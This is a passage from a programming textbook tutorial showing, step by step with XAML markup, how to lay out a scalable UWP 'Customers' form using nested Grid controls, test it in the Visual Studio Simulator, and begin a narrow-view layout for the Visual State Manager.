Implementing a scalable user interface
The key to laying out the user interface for a UWP app is to understand how
to make it scale and adapt to the different form factors available for the
devices on which users might run the app. In the following exercises, you
will investigate how to achieve this scaling.
Download from finelybook [email protected]
894
Lay out the page for the Customers app
1. In the toolbar at the top of the Design View window, notice the drop-
down list box that enables you to select the resolution and form factor of
the design surface and a pair of buttons that enable you to select the
orientation (portrait or landscape) for devices that support rotations
(tablets and phones do; desktops, Xbox, Surface Hub, IoT devices, and
HoloLens devices don’t). The intent is that you can use these options to
quickly see how a user interface will appear on different devices.
The default layout is for a Surface Book with a 13.5-inch screen in the
landscape orientation; this form factor does not support portrait mode.
2. In the drop-down list box, select 8” Tablet (1280 x 800). This is the
Download from finelybook [email protected]
895
form factor for a tablet device that supports rotations, and both
landscape and portrait modes are available.
Finally, click 13.3” Desktop. This is the form factor that you will use for
the Customers application. This form factor defaults to the landscape
orientation.
Note You might find that the page layout in the Design View
window appears too small (or too large). You can zoom in and out
by using the Zoom drop-down list box at the bottom left of the
Design View window.
3. Review the XAML markup for the MainPage page.
The page contains a single Grid control:
Click here to view code image
<Grid Background="{ThemeResource
ApplicationPageBackgroundThemeBrush}">
</Grid>
Note Don’t worry about the way in which the Background
property is specified for the Grid control. This is an example of
using a style, and you will learn about using styles later in this
chapter.
Understanding how the Grid control works is fundamental to building
scalable and flexible user interfaces. The Page element can contain only
a single item, and if you want, you can replace the Grid control with a
Button, as shown in the example that follows:
Download from finelybook [email protected]
896
Note Don’t type the following code. It is shown for illustrative
purposes only.
Click here to view code image
<Page
...
<Button Content="Click Me"/>
</Page>
However, the resulting app is probably not very useful; a form that
contains a button and that displays nothing else is unlikely to win an
award as the world’s greatest app. If you attempt to add a second
control, such as a TextBox, to the page, your code will not compile and
the errors shown in the following image will occur:
Download from finelybook [email protected]
897
The purpose of the Grid control is to facilitate adding multiple items to a
page. The Grid control is an example of a container control; it can
contain a number of other controls, and you can specify the position of
these other controls within the grid. Other container controls are also
available. For example, the StackPanel control automatically places the
controls it contains in a vertical arrangement, with each control
positioned directly below its immediate predecessor.
In this app, you will use a Grid to hold the controls necessary for a user
to be able to enter and view data for a customer.
4. Add a TextBlock control to the page, either by dragging it from the
Toolbox or by typing the text <TextBlock /> directly into the
XAML pane, on the blank line after the opening <Grid> tag, like this:
Click here to view code image
Download from finelybook [email protected]
898
<Grid Background="{ThemeResource
ApplicationPageBackgroundThemeBrush}">
<TextBlock />
</Grid>
Tip if the Toolbox does not appear, click Toolbox on the View
menu, and it should be displayed in the toolbar to the left. Click
Common XAML Controls to display the contents of the Toolbox.
Also, note that you can type the code for a control directly into the
XAML window for a page; you do not have to drag controls from
the Toolbox.
5. This TextBlock provides the title for the page. Set the properties of the
TextBlock control by using the values in the following table:
Property
Value
HorizontalAlignment
Left
Margin
400,90,0,0
TextWrapping
Wrap
Text
Adventure Works Customers
VerticalAlignment
Top
FontSize
50
You can set these properties by using the Properties window or by
typing the equivalent XAML markup into the XAML window, as shown
here in bold:
Click here to view code image
<TextBlock HorizontalAlignment="Left" Margin="400,90,0,0"
TextWrapping="Wrap"
Text="Adventure Works Customers" VerticalAlignment="Top"
FontSize="50"/>
The resulting text should appear in the Design View window, like this:
Download from finelybook [email protected]
899
Notice that when you drag a control from the Toolbox to a form,
connectors appear that specify the distance of two of the sides of the
control from the edge of the container control in which it is placed. In
the preceding example, these connectors for the TextBlock control are
labeled with the values 400 (from the left edge of the grid) and 90 (from
the top edge of the grid). At run time, if the Grid control is resized, the
TextBlock will move to retain these distances, which in this case might
cause the distance of the TextBlock in pixels from the right and bottom
edges of the Grid to change. You can specify the edge or edges to which
a control is anchored by setting the HorizontalAlignment and
VerticalAlignment properties. The Margin property specifies the
distance from the anchored edges. Again, in this example, the
HorizontalAlignment property of the TextBlock is set to Left and the
VerticalAlignment property is set to Top, which is why the control is
anchored to the left and top edges of the grid. The Margin property
contains four values that specify the distance of the left, top, right, and
bottom sides (in that order) of the control from the corresponding edge
of the container. If one side of a control is not anchored to an edge of the
container, you can set the corresponding value in the Margin property to
0.
6. Add four more TextBlock controls to the page. These TextBlock controls
are labels that help the user identify the data that is displayed on the
Download from finelybook [email protected]
900
page. Use the values in the following table to set the properties of these
controls:
Control
Property
Value
First Label
HorizontalAlignment
Left
Margin
330,190,0,0
TextWrapping
Wrap
Text
ID
VerticalAlignment
Top
FontSize
20
Second Label
HorizontalAlignment
Left
Margin
460,190,0,0
TextWrapping
Wrap
Text
Title
VerticalAlignment
Top
FontSize
20
Third Label
HorizontalAlignment
Left
Margin
620,190,0,0
TextWrapping
Wrap
Text
First Name
VerticalAlignment
Top
FontSize
20
Fourth Label
HorizontalAlignment
Left
Margin
975,190,0,0
TextWrapping
Wrap
Text
Last Name
VerticalAlignment
Top
FontSize
20
As before, you can either drag the controls from the Toolbox and use the
Properties window to set their properties, or you can type the following
XAML markup into the XAML pane, after the existing TextBlock
Download from finelybook [email protected]
901
control and before the closing </Grid> tag:
Click here to view code image
<TextBlock HorizontalAlignment="Left" Margin="330,190,0,0"
TextWrapping="Wrap"
Text="ID" VerticalAlignment="Top" FontSize="20"/>
<TextBlock HorizontalAlignment="Left" Margin="460,190,0,0"
TextWrapping="Wrap"
Text="Title" VerticalAlignment="Top" FontSize="20"/>
<TextBlock HorizontalAlignment="Left" Margin="620,190,0,0"
TextWrapping="Wrap"
Text="First Name" VerticalAlignment="Top" FontSize="20"/>
<TextBlock HorizontalAlignment="Left" Margin="975,190,0,0"
TextWrapping="Wrap"
Text="Last Name" VerticalAlignment="Top" FontSize="20"/>
7. Below the TextBlock controls, add three TextBox controls that display
the text ID, First Name, and Last Name. Use the following table to set
the values of these controls. Notice that the Text property should be set
to the empty string (“”). Also notice that the id TextBox control is
marked as read-only. This is because customer IDs will be generated
automatically in the code that you add later:
Control
Property
Value
First TextBox
x:Name
id
HorizontalAlignment
Left
Margin
300,240,0,0
TextWrapping
Wrap
Text
VerticalAlignment
Top
FontSize
20
IsReadOnly
True
Second TextBox
x:Name
firstName
HorizontalAlignment
Left
Margin
550,240,0,0
TextWrapping
Wrap
Text
VerticalAlignment
Top
Download from finelybook [email protected]
902
FontSize
20
Third TextBox
x:Name
lastName
HorizontalAlignment
Left
Margin
875,240,0,0
TextWrapping
Wrap
Text
VerticalAlignment
Top
FontSize
20
The following code shows the equivalent XAML markup for these
controls:
Click here to view code image
<TextBox x:Name="id" HorizontalAlignment="Left"
Margin="300,240,0,0" TextWrapping="Wrap"
Text="" VerticalAlignment="Top" FontSize="20"
IsReadOnly="True"/>
<TextBox x:Name="firstName" HorizontalAlignment="Left"
Margin="550,240,0,0"
TextWrapping="Wrap" Text="" VerticalAlignment="Top" Width="300"
FontSize="20"/>
<TextBox x:Name="lastName" HorizontalAlignment="Left"
Margin="875,240,0,0"
TextWrapping="Wrap" Text="" VerticalAlignment="Top" Width="300"
FontSize="20"/>
The Name property is not required for a control, but it is useful if you
want to refer to the control in the C# code for the app. Notice that the
Name property is prefixed with x:. This is a reference to the XML
namespace http://schemas.microsoft.com/winfx/2006/xaml specified in
the Page attributes at the top of the XAML markup. This namespace
defines the Name property for all controls.
Note It is not necessary to understand why the Name property is
defined this way, but for more information, you can read the article
“x:Name Directive” at
Download from finelybook [email protected]
903
http://msdn.microsoft.com/library/ms752290.aspx.
The Width property specifies the width of the control, and the
TextWrapping property indicates what happens if the user attempts to
enter information into the control that exceeds its width. In this case, all
the TextBox controls will wrap the text onto another line of the same
width (the control will expand vertically). The alternative value,
NoWrap, causes the text to scroll horizontally as the user enters it.
8. Add a ComboBox control to the form, placing it below the Title
TextBlock control, between the id and firstName TextBox controls. Set
the properties of this control as follows:
Property
Value
x:Name
title
HorizontalAlignment
Left
Margin
420,240,0,0
VerticalAlignment
Top
Width
100
FontSize
20
The equivalent XAML markup for this control is as follows:
Click here to view code image
<ComboBox x:Name="title" HorizontalAlignment="Left"
Margin="420,240,0,0"
VerticalAlignment="Top" Width="100" FontSize="20"/>
You use a ComboBox control to display a list of values from which the
user can select.
9. In the XAML pane, replace the definition of the ComboBox control and
add four ComboBoxItem controls, as follows in bold:
Click here to view code image
<ComboBox x:Name="title" HorizontalAlignment="Left"
Margin="420,240,0,0"
VerticalAlignment="Top" Width="75" FontSize="20">
<ComboBoxItem Content="Mr"/>
Download from finelybook [email protected]
904
<ComboBoxItem Content="Mrs"/>
<ComboBoxItem Content="Ms"/>
<ComboBoxItem Content="Miss"/>
</ComboBox>
The ComboxBoxItem elements are displayed in a drop-down list when
the app runs, and the user can select one of them.
There is one important syntactical point to notice in this code; the
ComboBox markup has been split into an opening <ComboBox> tag and
a closing </ComboBox> tag. You place the ComboBoxItem controls
between these opening and closing tags.
Note A ComboBox control can display simple elements such as a
set of ComboBoxItem controls that display text, but it can also
contain more complex elements such as buttons, check boxes, and
radio buttons. If you are adding simple ComboBoxItem controls, it
is probably easier to type the XAML markup by hand, but if you
are adding more complex controls, the Object Collection Editor
available in the Properties window can prove very useful.
However, you should avoid trying to be too clever in a combo box;
the best apps are those that provide the most intuitive UIs, and
embedding complex controls in a combo box can be confusing to a
user.
10. Add two more TextBox controls and two more TextBlock controls to the
form. With the TextBox controls, the user will be able to enter an email
address and a telephone number for the customer, and the TextBlock
controls provide the labels for the text boxes. Use the values in the
following table to set the properties of the controls.
Control
Property
Value
First TextBlock
HorizontalAlignment
Left
Margin
300,390,0,0
TextWrapping
Wrap
Download from finelybook [email protected]
905
Text
Email
VerticalAlignment
Top
FontSize
20
First TextBox
x:Name
email
HorizontalAlignment
Left
Margin
450,390,0,0
TextWrapping
Wrap
Text
Leave Empty
VerticalAlignment
Top
Width
400
FontSize
20
Second TextBlock
HorizontalAlignment
Left
Margin
300,540,0,0
TextWrapping
Wrap
Text
Phone
VerticalAlignment
Top
FontSize
20
Second TextBox
x:Name
phone
HorizontalAlignment
Left
Margin
450,540,0,0
TextWrapping
Wrap
Text
Leave Empty
VerticalAlignment
Top
Width
200
FontSize
20
The XAML markup for these controls should look like this:
Click here to view code image
<TextBlock HorizontalAlignment="Left" Margin="300,390,0,0"
TextWrapping="Wrap"
Text="Email" VerticalAlignment="Top" FontSize="20"/>
Download from finelybook [email protected]
906
<TextBox x:Name="email" HorizontalAlignment="Left"
Margin="450,390,0,0"
TextWrapping="Wrap" Text="" VerticalAlignment="Top" Width="400"
FontSize="20"/>
<TextBlock HorizontalAlignment="Left" Margin="300,540,0,0"
TextWrapping="Wrap"
Text="Phone" VerticalAlignment="Top" FontSize="20"/>
<TextBox x:Name="phone" HorizontalAlignment="Left"
Margin="450,540,0,0"
TextWrapping="Wrap" Text="" VerticalAlignment="Top" Width="200"
FontSize="20"/>
The completed form in the Design View window should look like this:
11. On the Debug menu, click Start Debugging to build and run the app.
The app starts and displays the form. You can enter data into the form
and select a title from the combo box, but you cannot do much else yet.
However, a much bigger problem is that, depending on the resolution of
your screen, the form looks awful (if the form looks fine, drag the right-
hand edge to make it narrower). The right side of the display has been
cut off, much of the text has wrapped around, and the Last Name text
box has been truncated:
Download from finelybook [email protected]
907
12. Click and drag the right side of the window to expand the display so that
the text and controls are displayed as they appeared in the Design View
window in Visual Studio. This is the optimal size of the form as it was
designed.
13. Resize the window displaying the Customer app to its minimum width.
This time, much of the form disappears. Some of the TextBlock content
wraps, but the form is clearly not usable in this view.
14. Return to Visual Studio, and on the Debug menu, click Stop Debugging.
That was a salutary lesson in being careful about how you lay out an app.
Although the app looked fine when it ran in a window that was the same size
as the Design View, as soon as you resized the window to a narrower view, it
became less useful (or even completely useless). Additionally, the app
assumes that the user will be viewing the screen on a device in the landscape
orientation. If you temporarily switch the Design View window to the 12”
Tablet form factor and click the Portrait orientation button, you can see what
the form would look like if the user ran the app on a tablet that supports
different orientations and rotated the device to switch to portrait mode. (Don’t
forget to switch back to the 13.3” Desktop form factor afterward.)
Download from finelybook [email protected]
908
The issue is that the layout technique shown so far does not scale and
adapt to different form factors and orientations. Fortunately, you can use the
properties of the Grid control and another feature called the Visual State
Manager to solve these problems.
Using the Simulator to test a Universal Windows
Platform app
Even if you don’t have a tablet computer, you can still test your UWP
apps and see how they behave on a mobile device by using the
Simulator provided with Visual Studio 2017. The Simulator mimics a
tablet device, providing you with the ability to emulate user gestures
such as pinching and swiping objects, as well as rotating and changing
the resolution of the device.
To run an app in the Simulator, open the Debug Target drop-down
list box on the Visual Studio toolbar. By default, the debug target is set
to Local Machine, which causes the app to run full-screen on your
computer, but you can select Simulator from this list, which starts the
Simulator when you debug the app. Note that you can also set the debug
target to a different computer if you need to perform remote debugging
(you will be prompted for the network address of the remote computer
when you select this option). The following image shows the Debug
Target list:
After you have selected the Simulator, when you run the app from
the Debug menu in Visual Studio, the Simulator starts and displays your
Download from finelybook [email protected]
909
app. The toolbar down the right side of the Simulator window contains
a selection of tools with which you can emulate user gestures by using
the mouse. You can even simulate the location of the user if the app
requires information about the geographic position of the device.
However, for testing the layout of an app, the most important tools are
Rotate Clockwise, Rotate Counterclockwise, and Change Resolution.
The following image shows the Customers app running in the
Simulator. The app has been maximized to occupy the full screen. The
labels describe the function of each of the buttons for the Simulator.
Note The screenshots in this section were captured on a computer
with the Simulator running at a resolution of 1366 x 768
(representing a 10.6-inch display). If you are using a different
display resolution, you might need to click the Change Resolution
button and switch to 1366 × 768 to get the same results as shown
here.
The following image shows the same app after the user has clicked
the Rotate Clockwise button, which causes the app to run in the portrait
orientation:
Download from finelybook [email protected]
910
You can also try to see how the app behaves if you change the
resolution of the Simulator. The following image shows the Customers
app running when the Simulator is set to a high-resolution device (2560
× 1440, the typical resolution of a 27-inch monitor). You can see that
the display for the app is squeezed into the upper-left corner of the
screen:
Download from finelybook [email protected]
911
The Simulator behaves exactly like a Windows 10 computer (it is, in
fact, a remote-desktop connection to your own computer). To stop the
Simulator, click the Windows button (in the Simulator, not on your
desktop), click Power, and then click Disconnect.
You should notice that Visual Studio also supports emulators for
specific mobile devices. Some may be listed in the Simulator drop-
down list box, but you can install new emulators as they become
available by selecting Download New Emulators.
Implementing a tabular layout by using a Grid control
You can use the Grid control to implement a tabular layout. A Grid contains
rows and columns, and you can specify in which rows and columns other
controls should be placed. The beauty of the Grid control is that you can
specify the sizes of the rows and columns that it contains as relative values;
as the grid shrinks or grows to adapt itself to the different form factors and
orientations to which users might switch, the rows and columns can shrink
and grow in proportion to the grid. The intersection of a row and a column in
Download from finelybook [email protected]
912
a grid defines a cell, and if you position controls in cells, they will move as
the rows and columns shrink and grow. Therefore, the key to implementing a
scalable UI is to break it down into a collection of cells and place related
elements in the same cell. A cell can contain another grid, giving you the
ability to fine-tune the exact positioning of each element.
If you consider the Customers app, you can see that the UI breaks down
into two main areas: a heading containing the title and the body containing
the customers’ details. Allowing for some spacing between these areas and a
margin at the bottom of the form, you can assign relative sizes to each of
these areas, as shown in the following diagram:
The diagram shows only rough approximations, but the row for the
heading is twice as high as the row for the spacer below it. The row for the
body is ten times as high as the spacer, and the bottom margin is twice the
height of the spacer.
To hold the elements in each area, you can define a grid with four rows
and place the appropriate items in each row. However, the body of the form
can be described by another, more complex grid, as shown in the following
diagram:
Download from finelybook [email protected]
913
Again, the height of each row is specified in relative terms, as is the width
of each column. Also, you can clearly see that the TextBox elements for
Email and Phone do not quite fit this grid pattern. If you were being pedantic,
you might choose to define further grids inside the body of the form to make
these items fit. However, you should keep in mind the purpose of this grid,
which is to define the relative positioning and spacing of elements. Therefore,
it is acceptable for an element to extend beyond the boundaries of a cell in the
grid arrangement.
In the next exercise, you will modify the layout of the Customers app to
use this grid format to position the controls.
Modify the layout to scale to different form factors and orientations
1. In the XAML pane for the Customers app, add another Grid inside the
existing Grid element, before the first TextBlock control. Give this new
Grid a margin of 10 pixels from the left and right edges of the parent
Grid and 20 pixels from the top and bottom, as shown in bold in the
following code:
Click here to view code image
<Grid Background="{ThemeResource
ApplicationPageBackgroundThemeBrush}">
<Grid Margin="10,20,10,20">
</Grid>
Download from finelybook [email protected]
914
<TextBlock HorizontalAlignment="Left" TextWrapping="Wrap"
Text="Adventure Works Customers" ... />
...
</Grid>
You could define the rows and columns as part of the existing Grid, but
to maintain a consistent look and feel with other UWP apps, you should
leave some blank space to the left and at the top of a page.
2. Add the following <Grid.RowDefinitions> section shown in bold to the
new Grid element.
Click here to view code image
<Grid Margin="10,20,10,20">
<Grid.RowDefinitions>
<RowDefinition Height="2*"/>
<RowDefinition Height="*"/>
<RowDefinition Height="10*"/>
<RowDefinition Height="2*"/>
</Grid.RowDefinitions>
</Grid>
The <Grid.RowDefinitions> section defines the rows for the grid. In this
example, you have defined four rows. You can specify the size of a row
as an absolute value specified in pixels, or you can use the * operator to
indicate that the sizes are relative and that Windows should calculate the
row sizes itself when the app runs, depending on the form factor and
resolution of the screen. The values used in this example correspond to
the relative row sizes for the header, body, spacer, and bottom margin of
the Customers form shown in the earlier diagram.
3. Move the TextBlock control that contains the text “Adventure Works
Customers” into the Grid, directly after the closing
</Grid.RowDefinitions> tag but before the closing </Grid> tag.
4. Add a Grid.Row attribute to the TextBlock control and set the value to 0.
Click here to view code image
<Grid Margin="10,20,10,20">
<Grid.RowDefinitions>
...
</Grid.RowDefinitions>
<TextBlock Grid.Row="0" ... Text="Adventure Works Customers"
... />
...
Download from finelybook [email protected]
915
</Grid>
This indicates that the TextBlock should be positioned within the first
row of the Grid. (Grid controls number rows and columns starting at
zero.)
Note The Grid.Row attribute is an example of an attached
property. An attached property is a property that a control receives
from the container control in which it is placed. Outside a grid, a
TextBlock does not have a Row property (it would be meaningless),
but when positioned within a grid, the Row property is attached to
the TextBlock, and the TextBlock control can assign it a value. The
Grid control then uses this value to determine where to display the
TextBlock control. Attached properties are easy to spot because
they have the form ContainerType.PropertyName.
5. Remove the Margin property, and set the HorizontalAlignment and
VerticalAlignment properties to Center.
This will cause the TextBlock to appear centered in the row.
The XAML markup for the Grid and TextBlock controls should look like
this (the changes to the TextBlock are highlighted in bold):
Click here to view code image
<Grid Margin="10,20,10,20">
...
</Grid.RowDefinitions>
<TextBlock Grid.Row="0" HorizontalAlignment="Center"
TextWrapping="Wrap"
Text="Adventure Works Customers" VerticalAlignment="Center"
FontSize="50"/>
...
</Grid>
6. After the TextBlock control, add another nested Grid control. This Grid
will be used to lay out the controls in the body of the form and should
appear in the third row of the outer Grid (the row of size 10*), so set the
Download from finelybook [email protected]
916
Grid.Row property to 2, as shown in bold in the following code:
Click here to view code image
<Grid Margin="10,20,10,20">
<Grid.RowDefinitions>
<RowDefinition Height="2*"/>
<RowDefinition Height="*"/>
<RowDefinition Height="10*"/>
<RowDefinition Height="2*"/>
</Grid.RowDefinitions>
<TextBlock Grid.Row="0" HorizontalAlignment="Center" .../>
<Grid Grid.Row="2">
</Grid>
...
</Grid>
7. Add the following <Grid.RowDefinitions> and
<Grid.ColumnDefinitions> sections to the new Grid control:
Click here to view code image
<Grid Grid.Row="2">
<Grid.RowDefinitions>
<RowDefinition Height="*"/>
<RowDefinition Height="*"/>
<RowDefinition Height="2*"/>
<RowDefinition Height="*"/>
<RowDefinition Height="2*"/>
<RowDefinition Height="*"/>
<RowDefinition Height="4*"/>
</Grid.RowDefinitions>
<Grid.ColumnDefinitions>
<ColumnDefinition Width="*"/>
<ColumnDefinition Width="*"/>
<ColumnDefinition Width="20"/>
<ColumnDefinition Width="*"/>
<ColumnDefinition Width="20"/>
<ColumnDefinition Width="2*"/>
<ColumnDefinition Width="20"/>
<ColumnDefinition Width="2*"/>
<ColumnDefinition Width="*"/>
</Grid.ColumnDefinitions>
</Grid>
These row and column definitions specify the height and width of each
of the rows and columns shown earlier in the diagram that depicted the
structure of the body of the form. There is a small space of 20 pixels
between each of the columns that will hold controls.
Download from finelybook [email protected]
917
8. Move the TextBlock controls that display the ID, Title, First Name, and
Last Name labels inside the nested Grid control, immediately after the
closing <Grid.ColumnDefinitions> tag.
9. Set the Grid.Row property for each TextBlock control to 0 (these labels
will appear in the first row of the grid). Set the Grid.Column property
for the ID label to 1, the Grid.Column property for the Title label to 3,
the Grid.Column property for the First Name label to 5, and the
Grid.Column property for the Last Name label to 7.
10. Remove the Margin property from each of the TextBlock controls, and
set the HorizontalAlignment and VerticalAlignment properties to Center.
The XAML markup for these controls should look like this (the changes
are highlighted in bold):
Click here to view code image
<Grid Grid.Row="2">
<Grid.RowDefinitions>
...
</Grid.RowDefinitions>
<Grid.ColumnDefinitions>
...
</Grid.ColumnDefinitions>
<TextBlock Grid.Row="0" Grid.Column="1"
HorizontalAlignment="Center"
TextWrapping="Wrap" Text="ID" VerticalAlignment="Center"
FontSize="20"/>
<TextBlock Grid.Row="0" Grid.Column="3"
HorizontalAlignment="Center"
TextWrapping="Wrap" Text="Title" VerticalAlignment="Center"
FontSize="20"/>
<TextBlock Grid.Row="0" Grid.Column="5"
HorizontalAlignment="Center"
TextWrapping="Wrap" Text="First Name" VerticalAlignment="Center"
FontSize="20"/>
<TextBlock Grid.Row="0" Grid.Column="7"
HorizontalAlignment="Center"
TextWrapping="Wrap" Text="Last Name" VerticalAlignment="Center"
FontSize="20"/>
</Grid>
11. Move the id, firstName, and lastName TextBox controls and the title
ComboBox control inside the nested Grid control, immediately after the
Last Name TextBlock control.
Place these controls in row 1 of the Grid control. Put the id control in
Download from finelybook [email protected]
918
column 1, the title control in column 3, the firstName control in column
5, and the lastName control in column 7.
Remove the Margin of each of these controls, and set the
VerticalAlignment property to Center. Remove the Width property, and
set the HorizontalAlignment property to Stretch. This causes the control
to occupy the entire cell when it is displayed, and the control shrinks or
grows as the size of the cell changes.
The completed XAML markup for these controls should look like this,
with changes highlighted in bold:
Click here to view code image
<Grid Grid.Row="2">
<Grid.RowDefinitions>
...
</Grid.RowDefinitions>
<Grid.ColumnDefinitions>
...
</Grid.ColumnDefinitions>
...
<TextBlock Grid.Row="0" Grid.Column="7" ... Text="Last Name"
.../>
<TextBox Grid.Row="1" Grid.Column="1" x:Name="id"
HorizontalAlignment="Stretch"
TextWrapping="Wrap" Text="" VerticalAlignment="Center"
FontSize="20" IsReadOnly="True"/>
<TextBox Grid.Row="1" Grid.Column="5" x:Name="firstName"
HorizontalAlignment="Stretch"
TextWrapping="Wrap" Text="" VerticalAlignment="Center"
FontSize="20"/>
<TextBox Grid.Row="1" Grid.Column="7" x:Name="lastName"
HorizontalAlignment="Stretch"
TextWrapping="Wrap" Text="" VerticalAlignment="Center"
FontSize="20"/>
<ComboBox Grid.Row="1" Grid.Column="3" x:Name="title"
HorizontalAlignment="Stretch"
VerticalAlignment="Center" FontSize="20">
<ComboBoxItem Content="Mr"/>
<ComboBoxItem Content="Mrs"/>
<ComboBoxItem Content="Ms"/>
<ComboBoxItem Content="Miss"/>
</ComboBox>
</Grid>
12. Move the TextBlock control for the Email label and the email TextBox
control to the nested Grid control, immediately after the closing tag of
Download from finelybook [email protected]
919
the title ComboBox control.
Place these controls in row 3 of the Grid control. Put the Email label in
column 1 and the email TextBox control in column 3. Additionally, set
the Grid.ColumnSpan property for the email TextBox control to 5; this
way, the column can spread to the value specified by its Width property
across five columns, as shown in the earlier diagram.
Set the HorizontalAlignment property of the Email label control to
Center, but leave the HorizontalAlignment property of the email
TextBox set to Left; this control should remain left-justified against the
first column that it spans rather than being centered across them all.
Set the VerticalAlignment property of the Email label and the email
TextBox control to Center.
Remove the Margin property for both of these controls.
The following XAML markup shows the completed definitions of these
controls:
Click here to view code image
<Grid Grid.Row="2">
<Grid.RowDefinitions>
...
</Grid.RowDefinitions>
<Grid.ColumnDefinitions>
...
</Grid.ColumnDefinitions>
...
<ComboBox Grid.Row="1" Grid.Column="3" x:Name="title" ...>
...
</ComboBox>
<TextBlock Grid.Row="3" Grid.Column="1"
HorizontalAlignment="Center"
TextWrapping="Wrap" Text="Email" VerticalAlignment="Center"
FontSize="20"/>
<TextBox Grid.Row="3" Grid.Column="3" Grid.ColumnSpan="5"
x:Name="email"
HorizontalAlignment="Left" TextWrapping="Wrap" Text=""
VerticalAlignment="Center"
Width="400" FontSize="20"/>
</Grid>
13. Move the TextBlock control for the Phone label and phone TextBox
Download from finelybook [email protected]
920
control to the nested Grid control, immediately after the email TextBox
control.
Place these controls in row 5 of the Grid control. Put the Phone label in
column 1 and the phone TextBox control in column 3. Set the
Grid.ColumnSpan property for the phone TextBox control to 3.
Set the HorizontalAlignment property of the Phone label control to
Center, and leave the HorizontalAlignment property of the phone
TextBox set to Left.
Set the VerticalAlignment property of both controls to Center, and
remove the Margin property.
The following XAML markup shows the completed definitions of these
controls:
Click here to view code image
<Grid Grid.Row="2">
<Grid.RowDefinitions>
...
</Grid.RowDefinitions>
<Grid.ColumnDefinitions>
...
</Grid.ColumnDefinitions>
....
<TextBox ... x:Name="email" .../>
<TextBlock Grid.Row="5" Grid.Column="1"
HorizontalAlignment="Center"
TextWrapping="Wrap" Text="Phone" VerticalAlignment="Center"
FontSize="20"/>
<TextBox Grid.Row="5" Grid.Column="3" Grid.ColumnSpan="3"
x:Name="phone"
HorizontalAlignment="Left" TextWrapping="Wrap" Text=""
VerticalAlignment="Center"
Width="200" FontSize="20"/>
</Grid>
14. On the Visual Studio toolbar, in the Debug Target list, select Simulator.
You will run the app in the Simulator so that you can see how the layout
adapts to different resolutions and form factors.
15. On the Debug menu, click Start Debugging.
The Simulator starts and the Customers app runs. Maximize the app so
Download from finelybook [email protected]
921
that it occupies the entire screen in the Simulator. Click Change
Resolution, and then configure the Simulator to display the app using a
screen resolution of 1366 × 768. Also, ensure that the Simulator is
displayed in landscape orientation (click Rotate Clockwise if it is
running in portrait orientation). Verify that the controls are evenly
spaced in this orientation.
16. Click the Rotate Clockwise button to rotate the Simulator to portrait
orientation.
The Customers app should adjust the layout of the user interface, and the
controls should still be evenly spaced and usable:
Download from finelybook [email protected]
922
17. Click Rotate Counterclockwise to put the Simulator back to landscape
orientation, and then click Change Resolution and switch the resolution
of the Simulator to 2560 × 1400.
Notice that the controls remain evenly spaced on the form, although the
labels might be quite difficult to read unless you actually have a 27-inch
screen.
Download from finelybook [email protected]
923
18. Click Change Resolution again and switch the resolution to 1024 × 768.
Again, notice how the spacing and size of the controls are adjusted to
maintain the even balance of the user interface:
19. In the Simulator, double-click the top edge of the form to restore the
view as a window, and then drag and resize the window so that the form
is displayed in the left half of the screen. Reduce the width of the
window to its minimum. This is how the app might appear on a device
such as a smartphone.
All the controls remain visible, but the text for the Phone label and the
title wrap, making them difficult to read, and the controls are not
particularly easy to use anymore:
Download from finelybook [email protected]
924
20. In the Simulator, click the Start button, click Settings, click Power, and
then click Disconnect.
The Simulator closes, and you return to Visual Studio.
21. On the Visual Studio toolbar, in the Debug Target drop-down list box,
select Local Machine.
Adapting the layout by using the Visual State Manager
The user interface for the Customers app scales for different resolutions and
form factors, but it still does not work well if you reduce the width of the
view, and it probably would not look too good on a smartphone, which has an
even narrower width. If you think about it, the solution to the problem in
these cases is not so much a matter of scaling the controls as actually laying
them out in a different way. For example, it would make better sense if the
Customers form looked like this in a narrow view:
Download from finelybook [email protected]
925
You can achieve this effect in several ways:
You can create several versions of the MainPage.xaml file, one for
each device family. Each of these XAML files can be linked to the
same code-behind (MainPage.xaml.cs) so that they all run the same
code. For example, to create an XAML file for a smartphone, add a
folder named DeviceFamily-Mobile (this name is important) to the
project and then add a new XAML view named MainPage.xaml to the
folder by using the Add New Item menu command. Lay out the
controls on this page folder as they should be displayed on a
smartphone. The XAML view will be linked automatically to the
existing MainPage.xaml.cs file. At runtime, the UWP will select the
appropriate view based on the type of device on which the app is
Download from finelybook [email protected]
926
running.
You can use the Visual State Manager to modify the layout of the page
at runtime. All UWP apps implement a Visual State Manager that
tracks the visual state of an app. It can detect when the height and
width of the window changes, and you can add XAML markup that
positions controls depending on the size of the window. This markup
can move controls around or display and hide controls.
You can use the Visual State Manager to switch between views based
on the height and width of the window. This approach is a hybrid
combination of the first two options described here, but it is the least
messy (you don’t have to write lots of tricky code to calculate the best
position for each control) and is also the most flexible (it will work if
the window is narrowed on the same device).
You’ll follow the third of these approaches in the next exercises. The first
step is to define a layout for the customers’ data that should appear in a
narrow view.
Define a layout for the narrow view
1. In the XAML pane for the Customers app, add the x:Name and Visibility
properties shown below in bold to the nested Grid control:
Click here to view code image
<Grid Background="{ThemeResource
ApplicationPageBackgroundThemeBrush}">
<Grid x:Name="customersTabularView" Margin="10,20,10,20"
Visibility="Collapsed">
...
</Grid>
</Grid>
This Grid control will hold the default view of the form. You will
reference this Grid control in other XAML markup later in this set of
exercises, hence the requirement to give it a name. The Visibility
property specifies whether the control is displayed (Visible) or hidden
(Collapsed). The default value is Visible, but for the time being, you will
hide this Grid while you define another for displaying the data in a
columnar format.
2. After the closing </Grid> tag for the customersTabularView Grid
Download from finelybook [email protected]
927
control, add another Grid control. Set the x:Name property to
customersColumnarView, set the Margin property to 10,20,10,20, and
set the Visibility property to Visible.
Tip You can expand and contract elements in the XAML pane of
the Design View window and make the structure easier to read by
clicking the + and – signs that appear down the left edge of the
XAML markup.
Click here to view code image
<Grid Background="{ThemeResource
ApplicationPageBackgroundThemeBrush}">
<Grid x:Name="customersTabularView" Margin="10,20,10,20"
Visibility="Collapsed">
...
</Grid>
<Grid x:Name="customersColumnarView" Margin="10,20,10,20"
Visibility="Visible">
</Grid>
</Grid>
This Grid control will hold the “narrow” view of the form. The fields in
this grid will be layed out in a columnar manner as described earlier.
3. In the customersColumnarView Grid control, add the following row
definitions:
Click here to view code image
<Grid x:Name="customersColumnarView" Margin="10,20,10,20"
Visibility="Visible">
<Grid.RowDefinitions>
<RowDefinition Height="*"/>
<RowDefinition Height="10*"/>
</Grid.RowDefinitions>
</Grid>
You will use the top row to display the title and the second, much larger
row to display the controls in which users enter data.
Download from finelybook [email protected]
928
4. Immediately after the row definitions, add the TextBlock control shown
